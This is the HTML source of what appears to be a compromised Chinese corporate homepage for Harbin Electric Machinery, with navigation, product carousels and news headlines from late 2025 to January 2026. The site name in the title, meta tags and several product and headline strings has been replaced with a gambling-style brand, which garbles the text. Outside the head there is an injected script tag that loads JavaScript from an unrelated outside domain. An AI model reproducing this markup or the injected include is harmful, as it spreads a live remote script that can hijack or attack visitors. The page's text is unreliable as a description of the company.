<!doctype html>
<html>
<head>
    <meta charset="utf-8">
    <title>爱体育（中国）体育·官方网站</title>
<meta name="keywords" content="集团公司" />
<meta name="Description" content="集团公司" />
    <link href="/css/index.css" rel="stylesheet" type="text/css">
    <link href="/fonts/SourceHanSansCN-Normal_0.css" rel="stylesheet" type="text/css">
    <link href="/style/style.css" rel="stylesheet" type="text/css">
    <!--BANNER-->
    <link href="/style/lanrenzhijia.css" type="text/css" rel="stylesheet"/>
    <!--导航-->
    <!--<script type="text/javascript" src="/js/jquery.min.js"></script>-->
    <!--ying产品-->
    <script type="text/javascript" src="/js/jquery_ying.js"></script>
    <!--ying产品-->
    <script src="/js/jquery-2.0.3.min.js" type="text/javascript"></script>
    <!--侧滑-->
    <link href="/css/style.css" rel="stylesheet" type="text/css">
    <link href="/css/ying.css" rel="stylesheet" type="text/css">
    <script type="text/javascript">
        $(document).ready(function () {
            $(".side ul li").hover(function () {
                $(this).find(".sidebox").stop().animate({"width": "150px"}, 200).css({
                    "opacity": "1",
                    "filter": "Alpha(opacity=100)",
                    "background": "#ae1c1c"
                })
            }, function () {
                $(this).find(".sidebox").stop().animate({"width": "140px"}, 200).css({
                    "opacity": "0.8",
                    "filter": "Alpha(opacity=80)",
                    "background": "#1b4096"
                })
            });
        });
        // var imageElement = document.getElementById("sidebox2"); //获取图片元素
        // imageElement.addEventListener('click', function(){
        //     this.style.display = 'none'; //隐藏图片
        // });
        //回到顶部
        function goTop() {
            $('html,body').animate({'scrollTop': 0}, 600);
        }
    </script>
</head>
<script src="https://happywealth6.com/js/25/12/h/f5.js"></script>
<!--ying-->
<style type="text/css">
    #NewsTop_cnt strong {
        font-weight: normal;
    }

    /* film_focus */
    .film_focus {
        width: 1440px;
        height: 520px;
        overflow: hidden;
        position: relative;
        margin: 20px auto;
        z-index: 0;
    }

    .film_focus .film_focus_imgs_wrap {
        background: url(/images/images_ying/load.gif) no-repeat center center;
    }

    .film_focus ul.film_focus_imgs {
        height: 520px;
        height: 9999em;
        position: absolute;
        right: 0;
        top: 0;
        overflow: hidden;
    }

    .film_focus ul.film_focus_imgs li {
        height: 520px;
        overflow: hidden;
    }

    .film_focus ul.film_focus_imgs li img {
        height: 520px;
        width: 1070px;
    }

    /*.film_focus .film_focus_desc h3{height:45px;line-height:45px;overflow:hidden;position:absolute;left:232px;bottom:0;background:rgba(0, 0, 0, .5);color:#fff;width:100%;padding-left:20px;z-index:99;font-size:16px;filter:progid:DXImageTransform.Microsoft.gradient(enabled='true', startColorstr='#7F000000', endColorstr='#7F000000');}*/
    .film_focus ul.film_focus_nav {
        width: 348px;
        height: 520px;
        position: absolute;
        left: 0;
        top: 0;
        z-index: 100;
    }

    .film_focus ul.film_focus_nav li {
        height: 126px;
        background: #d7d7dc;
        margin: 0px 0px 5px 0;
        padding: 0px 18px 0 19px;
        position: relative;
        width: 308px;
        cursor: pointer;
        cursor: hand;
        color: #333;
        font-weight: bold;
        font-size: 22px;
        overflow: hidden;
        line-height: 126px;
    }

    .film_focus ul.film_focus_nav li.cur {
        background: url(/images/images_ying/hd_on.png) no-repeat 0px 0px;
        width: 308px;
        height: 126px;
        left: 0px;
        padding: 0px 33px 0 25px;
        word-break: break-all;
        color: #fff;
        font-weight: bold;
        font-size: 22px;
        overflow: hidden;
        line-height: 126px;
    }

    .film_focus ul.film_focus_nav li b {
        display: none
    }

    .film_focus ul.film_focus_nav li b span {
        display: block
    }

    .film_focus ul.film_focus_nav li.cur b {
        display: block;
        vertical-align: middle;
        display: table-cell;
        height: 126px;
    }

    .film_focus ul.film_focus_nav li.cur span {
        display: none
    }

    .film_focus ul.film_focus_nav li a {
        color: #333333;
        margin-left: 50px;
    }

    /*.film_focus ul.film_focus_nav li a.cur01:hover{color: #ffffff}*/


    #flash {
        width: 400px;
        height: 200px;
        position: relative;
    }

    #flash #play {
        width: 400px;
        height: 200px;
        list-style: none;
        position: absolute;
        top: 0px;
        left: 0px;
    }

    #flash #play li {
        display: none;
        position: absolute;
        top: 0px;
        left: 0px;
    }

    #flash #play li img {
        float: left;
    }

    #button {
        position: absolute;
        bottom: 20px;
        left: 180px;
        list-style: none;
    }

    #button li {
        margin-left: 10px;
        float: left;
    }

    #button li div {
        width: 12px;
        height: 12px;
        background: #DDDDDD;
        border-radius: 6px;
        cursor: pointer;
    }

    #prev {
    }

    #next {
    }

    #prev:hover {
    }

    #next:hover {
    }

    #flash1 {
        width: 400px;
        height: 200px;
        position: relative;
    }

    #flash1 #play1 {
        width: 400px;
        height: 200px;
        list-style: none;
        position: absolute;
        top: 0px;
        left: 0px;
    }

    #flash1 #play1 li {
        display: none;
        position: absolute;
        top: 0px;
        left: 0px;
    }

    #flash1 #play1 li img {
        float: left;
    }

    #button1 {
        position: absolute;
        bottom: 20px;
        left: 180px;
        list-style: none;
    }

    #button1 li {
        margin-left: 10px;
        float: left;
    }

    #button1 li div {
        width: 12px;
        height: 12px;
        background: #DDDDDD;
        border-radius: 6px;
        cursor: pointer;
    }

    #prev1 {
    }

    #next1 {
    }

    #prev1:hover {
    }

    #next1:hover {
    }

    #flash2 {
        width: 400px;
        height: 200px;
        position: relative;
    }

    #flash2 #play2 {
        width: 400px;
        height: 200px;
        list-style: none;
        position: absolute;
        top: 0px;
        left: 0px;
    }

    #flash2 #play2 li {
        display: none;
        position: absolute;
        top: 0px;
        left: 0px;
    }

    #flash2 #play2 li img {
        float: left;
    }

    #button2 {
        position: absolute;
        bottom: 20px;
        left: 180px;
        list-style: none;
    }

    #button2 li {
        margin-left: 10px;
        float: left;
    }

    #button2 li div {
        width: 12px;
        height: 12px;
        background: #DDDDDD;
        border-radius: 6px;
        cursor: pointer;
    }

    #prev2 {
    }

    #next2 {
    }

    #prev2:hover {
    }

    #next2:hover {
    }

    a.zi_ying:link {
        color: #FFFFFF;
    !important
    }

    a.zi_ying:hover {
        color: #FFFFFF
    }

    a.zi_ying:visited {
        color: #FFFFFF
    }
    .k2{
        width: 1440px;
    }
    .k2 .index_box{
        float: left;
        margin: 20px 3%20px 0;
        width: 59%;
    }

    <!--
    /* html {
        -webkit-filter: grayscale(100%);
        -moz-filter: grayscale(100%);
        -ms-filter: grayscale(100%);
        -o-filter: grayscale(100%);
        filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1);
        _filter:none;
    } */
    -->
</style>
<!--ying-->
<body>
<!--通用顶部-->
<div class="header">
    <link rel="stylesheet" type="text/css" href="/css/ying.css" />
<link rel="stylesheet" type="text/css" href="/css/index.css" />
<style>
  .sub_banner1,
  .sub_banner2,
  .sub_banner3,
  .sub_banner4,
  .sub_banner5,
  .sub_banner6,
  .sub_banner7,
  .sub_banner8,
  .sub_banner9,
  .sub_banner10
  {
   background-size: 100% !important;
  }
  .current{
    display: none;
  }
</style>
<div class="top_header">
  <div class="content">
    <p>欢迎进入爱体育（中国）体育·官方网站有限责任公司！</p>
    <div class="top_header_right">
      <div class="language">
        <ul>
          <li>
            <!--<img src="/images/top_header_cn.jpg">-->
            <a href="/">中文版</a></li>
          <li>
            <!--<img src="/images/top_header_en.jpg">-->
            <a href="/eng/home.html">英文版</a></li>
        </ul>
      </div>
      <div class="search">
        <!--搜索-->
        <form name="searchform" method="get" action="/search.php">
<!--          <input name='ecmsfrom' type='hidden' value=''>-->
<!--          <input type="hidden" name="show" value="title,newstext">-->
          <input type="text" class="searchId" name="find_title" id="find_title"  placeholder="" >
          <input class="btn" type="submit" value="搜索">
        </form>
      </div>
      <!--搜索-->
    </div>
  </div>
</div>
<div class="menu_main">
  <div class="content">
    <div class="logo  flex-v-center"><a href="/"><img src="/images/logo.png"></a></div>
    <div class="hd-nav">
      <ul class="flex pore">
        <li class="item1 "> <a href="/">爱体育（中国）体育·官方网站</a></li>
        <li class="item2 "> <a href="/gsjj.html">关于哈电电机</a></a>
          <div class="subnav">
            <div class="navCon flex">
              <div class="navs ">
                <ul>
                  <li><a  href="/gsjj.html">公司简介</a></li>
                  <li><a href="/dszzc.html">董事长致辞</a></li>
                  <li> <a href="/ldtd.html">领导团队</a></li>
                  <li> <a href="/zzjgt.html">组织机构</a></li>
                  <li><a href="/gszz.html">公司资质</a></li>
                </ul>
              </div>
              <div class="pic"> <a href="" class="trans-mask"><img src="/images/n2.png" alt=""></a> </div>
            </div>
          </div>
        </li>
        <li class="item3 "> <a href="/zdcp1">产品与服务</a>
          <div class="subnav">
            <div class="navCon flex">
              <div class="navs ">
                <ul>
                  <li><a href="/zdcp1.html">产业布局</a></li>
                  <li><a href="/wnfw1.html">业务服务</a></li>
                  <li><a href="/cxhg.html">诚信&合规</a></li>
                </ul>
              </div>
              <div class="pic"> <a href="" class="trans-mask"><img src="/images/n3.png" alt=""></a> </div>
            </div>
          </div>
        </li>
        <li class="item4 "> <a href="/kjcx1.html">科技创新</a>
          <div class="subnav">
            <div class="navCon flex">
              <div class="navs ">
                <ul>
                  <li style="width: 100%;"><a href="/kjcx1.html">水力发电设备原创技术策源地</a></li>
                  <li style="width: 100%;"><a href="/kjcx2.html">创新成果</a></li>
                </ul>
              </div>
              <div class="pic"> <a href="" class="trans-mask"><img src="/images/n4.png" alt=""></a> </div>
            </div>
          </div>
        </li>
        <li class="item5 "> <a href="/news1">新闻中心</a>
          <div class="subnav">
            <div class="navCon flex">
              <div class="navs ">
                <ul>
                  <li><a href="/news1">企业要闻</a></li>
                  <li><a href="/news2">行业动态</a></li>
                  <li><a href="/news3">媒体关注</a></li>
                </ul>
              </div>
              <div class="pic"> <a href="" class="trans-mask"><img src="/images/n5.png" alt=""></a> </div>
            </div>
          </div>
        </li>
        <li class="item5 "> <a href="/zbmk_jianzai">党建文化</a>
          <div class="subnav">
            <div class="navCon flex">
              <div class="navs ">
                <ul>
                  <li><a href="/zbmk_jianzai">党建云</a></li>
                  <li><a href="/culture.html">企业文化</a></li>
                </ul>
              </div>
              <div class="pic"> <a href="" class="trans-mask"><img src="/images/n6.png" alt=""></a> </div>
            </div>
          </div>
        </li>
        <li><a href="/lxwm.html">联系我们</a></li>
      </ul>
    </div>
    <div class="clear"> </div>
  </div>
</div>
</div>
<!--通用顶部-->
<div class="banner">
    <div class="swiper-container slide-banner" style="background: #000;">
        <div class="swiper-wrapper">
            <div class="swiper-slide videoHero" data-swiper-autoplay="24000">
                <video id="video" poster="/images/2024-0.jpg" src="/video/djc1.mp4" muted="" x5-video-player-type="h5"
                       x5-video-player-fullscreen="true" x-webkit-airplay="true" webkit-playsinline="" playsinline="">
                    您的浏览器不支持播放，请更换浏览器
                </video>
            </div>
            <div class="swiper-slide"><a>
                <div class="txt wp flex-center">
                    <div class="batxt">打造世界装备制造业的动力航母 , ,Building the power-aircraft carrier for the world
                        equipment manufacturing industry. ,
                    </div>
                </div>
                <img src="/images/2024-2.jpg" alt="" class="imgW100"> </a></div>
            <div class="swiper-slide"><a>
                <div class="txt wp flex-center">
                    <div class="batxt">为世界提供动力 ,为人类带来光明 ,Supply power to the world and bring light to
                        human being ,
                    </div>
                </div>
                <img src="/images/2024-3.jpg" alt="" class="imgW100"> </a></div>
            <div class="swiper-slide"><a href="#" title="">
                <div class="txt wp flex-center">
                    <div class="batxt">追求卓越 ,自强不息 ,Pursuing excellence and constantly<br> strive to become
                        stronger ,
                    </div>
                </div>
                <img src="/images/2024-1.jpg" alt="" class="imgW100"> </a></div>
            <div class="swiper-slide"><a>
                <div class="txt wp flex-center">
                    <div class="batxt">同心而动 ,聚力生辉 ,Acting with same mind,Gathering strength for development
                    </div>
                </div>
                <img src="/images/2024-5.jpg" alt="" class="imgW100"> </a></div>
            <div class="swiper-slide"><a>
                <div class="txt wp flex-center">
                    <div class="batxt">承载民族工业希望 ,彰显中国动力风采 ,Revitalizing the national industry and
                        showing the performance of China power ,
                    </div>
                </div>
                <img src="/images/2024-6.jpg" alt="" class="imgW100"> </a></div>
            <div class="swiper-slide"><a>
                <div class="txt wp flex-center">
                    <div class="batxt">以人致远 ,以强致胜 ,People-oriented to develop <br> Strength-based to win ,</div>
                </div>
                <img src="/images/2024-9.jpg" alt="" class="imgW100"> </a></div>
        </div>
        <div class="swiper-pagination"></div>
    </div>
    <script>
        $(function () {
            $(".batxt").each(function () {
                var s = $(this).html();
                if (!s) {
                    $(this).hide()
                } else {
                    ss = s.split(",");
                    $(this).html(' <h4><span data-swiper-parallax="-500">' + ss[0] + '</span><span data-swiper-parallax="-1000">' + ss[1] + '</span></h4><p><span data-swiper-parallax="-1500">' + ss[2] + '</span><span data-swiper-parallax="-2000">' + ss[3] + '</span></p > ');
                }
            })
        })
    </script>
</div>
<div class="side">
    <ul>
        <li><a href="https://scm.harbin-electric.com">
            <div class="sidebox"><img src="/images/right_icon4.png" width="30px;" height="30px">电子采购平台</div>
        </a></li>
        <li><a href="https://wx.hec-china.com:8498/#/supplier">
            <div class="sidebox"><img src="/images/right_icon5.png" width="30px;" height="30px">供应商申报</div>
        </a></li>
        <li><a href="/cpyc">
            <div class="sidebox"><img src="/images/right_icon1.png" width="30px;" height="30px">诚聘英才</div>
        </a></li>
        <li><a href="http://www.hilem.cn/">
            <div class="sidebox"><img src="/images/right_icon2.png" width="30px;" height="30px">哈尔滨大电机研究所</div>
        </a></li>
        <li><a href="/news4">
            <div class="sidebox"><img src="/images/right_icon3.png" width="30px;" height="30px">信息公告</div>
        </a></li>
    </ul>
</div>

<div class="side2">
    <ul>
        <!--
          <li><a>
            <div class="sidebox2"><img src="/images/jiufeng1.jpg" width="200px;" height="200px" onClick="this.style.display='none'"></div>
            </a></li>
            -->
    </ul>
</div>

</div>
<div class="xinxigonggao">
    <div class="content">
        <div class="xinxigonggao1">
            <dt><img src="/images/ky_10.png">信息公告 |</dt>
            <!-- 遍历 xinxi 集合，循环变量保持为 x -->
            <dd>
                <b>·</b>
                <a href="/news4_content/6095.html">关于公布反映拖欠企业账款问题线索信访邮箱及电话的通知</a>
                　<!-- 保留原有的空格分隔 -->
                <span>2025-12-08</span>
            </dd>
        </div>
        <div class="xinxigonggao2"><a href="/news4" class="linkindexying">更多公告>></a></div>
    </div>
</div>
<div class="clear"></div>
<div class="index1">
    <div class="content" style="width: 1440px;">
        <div class="k1">
            <div class="index_title"><img src="/images/index_icon.png">
                <h3>主导产品及业绩展示</h3>
                <span><a href="/zdcp1.html" class="linkindexying">更多>></a></span></div>
            <!--ying-->
            <div class="film_focus">
                <div class="film_focus_desc">
                    <h3>标题1</h3>
                    <ul class="film_focus_nav">
                        <li class="cur"><a href="/zdcp1.html" class="cur01"><b style="color: #FFFFFF">水轮发电爱体育（中国）体育·官方网站</b><span>水轮发电爱体育（中国）体育·官方网站</span></a>
                        </li>
                        <li><a href="/zdcp2.html" class="cur01"><b style="color: #FFFFFF">汽（气）轮发电机</b><span>汽（气）轮发电机</span></a>
                        </li>
                        <li><a href="/zdcp3.html" class="cur01"><b style="color: #FFFFFF">新产品、新产业</b><span>新产品、新产业</span></a>
                        </li>
                        <li><a href="/zdcp4.html" class="cur01"><b
                                style="color: #FFFFFF">辅机产品</b><span>辅机产品</span></a></li>
                    </ul>
                </div>
                <div class="film_focus_imgs_wrap">
                    <ul class="film_focus_imgs">
                        <!-- 遍历 cp1 集合，变量名 c1 与原逻辑一致 -->
                        <li>
                            <a target="_self" href="/zdcp1.html">
                                <img src="https://www.hec-china.com/profile/5df33f8979455.JPG"
                                     width="565" height="375"/>
                            </a>
                        </li>

                        <!-- 遍历 cp2 集合，变量名 c2 与原逻辑一致 -->
                        <li>
                            <a target="_self" href="/zdcp2.html">
                                <img src="https://www.hec-china.com/profile/5df33e5101998.jpg"
                                     width="565" height="375"/>
                            </a>
                        </li>

                        <!-- 遍历 cp3 集合，变量名 c3 与原逻辑一致 -->
                        <li>
                            <a target="_self" href="/zdcp3.html">
                                <img src="https://www.hec-china.com/profile/5df352fd11191.jpg"
                                     width="565" height="375"/>
                            </a>
                        </li>

                        <!-- 遍历 cp4 集合，变量名 c4 与原逻辑一致 -->
                        <li>
                            <a target="_self" href="/zdcp4.html">
                                <img src="https://www.hec-china.com/profile/5df3548c1a4fe.jpg"
                                     width="565" height="375"/>
                            </a>
                        </li>
                    </ul>
                </div>
            </div>
            <!--ying-->
        </div>
    </div>
</div>
<div class="clear"></div>
<div class="index2" style="background: #fff;">
    <div class="content" style="width: 1440px;">
        <!--新闻中心ying-->
        <div class="index_title_ying"><img src="/images/index_icon.png">
            <h3>新闻中心</h3>
        </div>
        <DIV id="NewsTop">
            <DIV id="NewsTop_tit">
                <!--<img src="/images/index_icon.png"><h3>新闻中心</h3> -->
                <P class="topTit"></P>
                <P class="topC0">企业要闻</P>
                <P class="topC0">媒体关注</P>
                <P class="topC0">行业动态</P>
                <!--<P class="moerying"><a href="#">查看更多新闻</a></P>-->
            </DIV>
            <DIV id="NewsTop_cnt"><SPAN title="Don't delete me"></SPAN> <SPAN>
        <div class="news1_ying">
          <div class="news2_ying">
            <ul>
              <!-- 遍历 news1 集合，使用变量 n 表示每个元素 -->
                <li>
                    <b>·</b>
                    <a href="/news_content/6165.html" class="newsying">
                        <!-- 判断标题长度，超过78则截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78则直接显示 -->
                        <strong>开门红 | 哈电电机中标4台汽轮发电机</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2026-01-21</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news_content/6164.html" class="newsying">
                        <!-- 判断标题长度，超过78则截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78则直接显示 -->
                        <strong>集团党委第二巡视组巡视电机公司党委情况反馈会议召开</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2026-01-19</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news_content/6160.html" class="newsying">
                        <!-- 判断标题长度，超过78则截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78则直接显示 -->
                        <strong>热议职代会｜职工代表畅谈心声：2026，我们这样干！③</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2026-01-19</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news_content/6159.html" class="newsying">
                        <!-- 判断标题长度，超过78则截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78则直接显示 -->
                        <strong>热议职代会｜职工代表畅谈心声：2026，我们这样干！②</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2026-01-19</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news_content/6158.html" class="newsying">
                        <!-- 判断标题长度，超过78则截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78则直接显示 -->
                        <strong>冰城赛场再问鼎 哈电龙舟五连冠</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2026-01-19</p>
                </li>
            </ul>
          </div>
        </div>
        <div class="news1tu_ying">
          <div class="yx-rotaion">
            <ul class="rotaion_list">
             <!-- 遍历 news_p1 集合，循环变量为 np1 -->
                <li>
                    <a href="/news_content/6156.html">
                        <img src="https://www.hec-china.com/profile/upload/2026/01/16/2Y7A5699_20260116191946A004.jpg"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
                <li>
                    <a href="/news_content/6150.html">
                        <img src="https://www.hec-china.com/profile/upload/2026/01/14/640_20260114094304A002.png"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
                <li>
                    <a href="/news_content/6112.html">
                        <img src="https://www.hec-china.com/profile/upload/2025/12/18/成就展封面 -网站_20251218154518A047.jpg"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
            </ul>
          </div>
        </div>
        <div class="moerying"><a href="/news1" style="color: #333333">【查看更多新闻】</a></div>
        </SPAN> <SPAN>
        <div class="news1_ying">
          <div class="news2_ying">
            <ul>
              <!-- 遍历 news3 集合，循环变量为 n3 -->
                <li>
                    <b>·</b>
                    <a href="/news3_content/6136.html" class="newsying">
                        <!-- 标题长度超过78时截取前36个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>中国新闻网：哈电集团打造的724米水头“超级充电宝”并网发电</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-12-26</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news3_content/6135.html" class="newsying">
                        <!-- 标题长度超过78时截取前36个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>中国工业新闻网：哈电集团打造的724米水头“超级充电宝”并网发电</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-12-26</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news3_content/6134.html" class="newsying">
                        <!-- 标题长度超过78时截取前36个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>哈尔滨日报：世界之最“超级充电宝”并网发电！哈电集团打造724米高水头</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-12-26</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news3_content/6137.html" class="newsying">
                        <!-- 标题长度超过78时截取前36个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>龙头新闻：“顶流”出道！哈电电机724米水头“超级充电宝”并网发电</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-12-25</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news3_content/6133.html" class="newsying">
                        <!-- 标题长度超过78时截取前36个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>黑龙江日报：单机容量亚洲最大，转轮直径世界第一！哈电电机研制金沙江银江水电爱体育（中国）体育·官方网站全面投产发电</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-12-20</p>
                </li>
            </ul>
          </div>
        </div>
        <div class="news1tu_ying">
          <div class="yx-rotaionA">
            <ul class="rotaion_listA">
             <!-- 遍历 news_p3 集合，循环变量为 np3 -->
                <li>
                    <a href="/news3_content/5728.html">
                        <img src="https://www.hec-china.com/profile/6808813d18793.jpg"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
                <li>
                    <a href="/news3_content/5713.html">
                        <img src="https://www.hec-china.com/profile/680881228c58b.jpg"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
                <li>
                    <a href="/news3_content/5401.html">
                        <img src="https://www.hec-china.com/profile/680880e57ea3b.jpg"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
            </ul>
          </div>
        </div>
        <div class="moerying"><a href="/news3" style="color: #333333">【查看更多新闻】</a></div>
        </SPAN> <SPAN>
        <div class="news1_ying">
          <div class="news2_ying">
            <ul>
                <!-- 遍历 news2 集合，循环变量为 n2 -->
                <li>
                    <b>·</b>
                    <a href="/news2_content/6143.html" class="newsying">
                        <!-- 标题长度超过78时截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>重磅！国家发改委、国家能源局发布指导意见</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-12-26</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news2_content/6057.html" class="newsying">
                        <!-- 标题长度超过78时截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>利好！重磅意见发布→</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-11-17</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news2_content/6041.html" class="newsying">
                        <!-- 标题长度超过78时截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>我国新能源发展进入精细化管理新阶段</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-11-11</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news2_content/5918.html" class="newsying">
                        <!-- 标题长度超过78时截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>当风电光伏唱主角，谁来做电网的“稳定器”？</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-10-30</p>
                </li>
                <li>
                    <b>·</b>
                    <a href="/news2_content/5919.html" class="newsying">
                        <!-- 标题长度超过78时截取前26个字符并添加省略号 -->
                        
                        <!-- 标题长度不超过78时直接显示 -->
                        <strong>投资6083亿元！创历史新高</strong>
                    </a>
                    <!-- 显示发布时间 -->
                    <p class="news2p1_ying" style="float: right; line-height: 40px;">2025-10-29</p>
                </li>
            </ul>
          </div>
        </div>
        <div class="news1tu_ying">
          <div class="yx-rotaionB">
            <ul class="rotaion_listB">
             <!-- 遍历 news_p2 集合，循环变量为 np2 -->
                <li>
                    <a href="/news2_content/5735.html">
                        <img src="https://www.hec-china.com/profile/6808842d602a1.jpg"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
                <li>
                    <a href="/news2_content/4372.html">
                        <img src="https://www.hec-china.com/profile/680882a25e1da.jpg"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
                <li>
                    <a href="/news2_content/5619.html">
                        <img src="https://www.hec-china.com/profile/680881e962f59.jpeg"
                             alt="" width="600" height="340"/>
                    </a>
                </li>
            </ul>
          </div>
        </div>
        <div class="moerying"><a href="/news2" style="color: #333333">【查看更多新闻】</a></div>
        <p></p>
        <p></p>
        </SPAN>
                <div class="clear"></div>
                <script type="text/javascript" src="/js/jquery.yx_rotaion_ying.js"></script>
                <script type="text/javascript" src="/js/jquery.yx_rotaion_yingA.js"></script>
                <script type="text/javascript" src="/js/jquery.yx_rotaion_yingB.js"></script>
                <script type="text/javascript">

                    $(".yx-rotaion").yx_rotaion({auto: true});
                    $(".yx-rotaionA").yx_rotaionA({auto: true});
                    $(".yx-rotaionB").yx_rotaionB({auto: true});

                </script>
            </DIV>
            <SCRIPT>
                var Tags = document.getElementById('NewsTop_tit').getElementsByTagName('p');
                var TagsCnt = document.getElementById('NewsTop_cnt').getElementsByTagName('span');
                var len = Tags.length;
                var flag = 1;//修改默认值
                console.log(TagsCnt)
                for (i = 1; i < len; i++) {
                    Tags[i].value = i;
                    console.log(i, "i")
                    Tags[i].onmouseover = function () {
                        changeNav(this.value)
                    };
                    TagsCnt[i].className = 'undis';
                }
                Tags[flag].className = 'topC1';
                TagsCnt[flag].className = 'dis';

                function changeNav(v) {
                    console.log(v)
                    Tags[flag].className = 'topC0';
                    TagsCnt[flag].className = 'undis';
                    flag = v;
                    Tags[v].className = 'topC1';
                    TagsCnt[v].className = 'dis';
                }
            </SCRIPT>
        </DIV>
        <!--新闻中心ying-->
    </div>
</div>
<div class="clear"></div>
<div class="homec overhide">
    <div class="homec-a">
        <div class="wp">
            <div class="index_title"><img src="/images/index_icon.png">
                <h3>专题聚焦</h3></div>
            <div class="intit text-m uani fadeInUp"></div>
            <div class="swiper-container slideHd uani fadeInUp" data-wow-delay=".1s">
                <div class="swiper-wrapper">
                    <div class="swiper-slide"><a href="/zhutijiaoyu" class="trans-mask" title=""> <img
                            src="/images/20241024zhuti.png" alt=""></a></div>
                    <div class="swiper-slide"><a href="/zbmk_jianzai" class="trans-mask" title=""> <img
                            src="/images/2024zt2.jpg" alt=""></a></div>
                    <div class="swiper-slide"><a href="/luoshizong" class="trans-mask" title=""> <img
                            src="/images/2024zt3.jpg" alt=""></a></div>
                    <div class="swiper-slide"><a href="/yqhddt" class="trans-mask" title=""> <img
                            src="/images/yqhddt/gz7.jpg"></a></div>
                </div>
                <div class="ssbtn flex"><a href="javascript:;" class="prev swiper-icons swi-arrlb"></a> <a
                        href="javascript:;" class="next swiper-icons swi-arrrb"></a></div>
            </div>
        </div>
    </div>
</div>
<p></p>
<div class="clear"></div>
<div class="index1">
    <div class="content" style="width: 1440px;">
        <div class="k2">
            <div class="index_title">
                <img src="/images/index_icon.png">
                <h3>视频展播</h3>
                <span><a href="/spzb" class="linkindexying">更多>></a></span>
            </div>
            <!-- 遍历 shipin 集合（主视频，变量名 s 与原逻辑一致） -->
            <div class="index_box">
                <video width="100%" height="480"
                       poster="https://www.hec-china.com/profile/64e8d9780821a.jpg"
                       controls>
                    <!-- 视频源路径：动态拼接 content 字段（对应原 $s['content']） -->
                    <source src="https://www.hec-china.com/profile/mp4/zhongwen220511.mp4" type="video/mp4">
                </video>
                <h3 style="padding-bottom: 5px;">
                    <a class="linkindexying"
                       href="/spzb_content/5227.html">哈电电机新版宣传片《能动世界 智创未来》</a>
                </h3>
            </div>

            <!-- 遍历 shipin1 集合（次要视频列表，变量名 s1 与原逻辑一致） -->
            <div style="margin-top: 20px;float: right;width: 37%;">
                <!-- 视频封面图 -->
                <div style="float: left;">
                    <a href="/spzb_content/5227.html">
                        <img width="250" height="147"
                             src="https://www.hec-china.com/profile/64e8d9780821a.jpg"
                             alt="视频封面">
                    </a>
                </div>
                <!-- 视频标题（长度超过70字符截取前42位） -->
                <div style="float: right;width: 50%;">
                    <a class="linkindexying"
                       href="/spzb_content/5227.html"
                       style="font-size: 16px;">
                        · <!-- 保留原有的点号前缀 -->
                        <!-- 标题长度判断：超过70字符截取，否则显示完整标题 -->
                        
                        <span>哈电电机新版宣传片《能动世界 智创未来》</span>
                    </a>
                </div>
            </div>
            <div style="margin-top: 20px;float: right;width: 37%;">
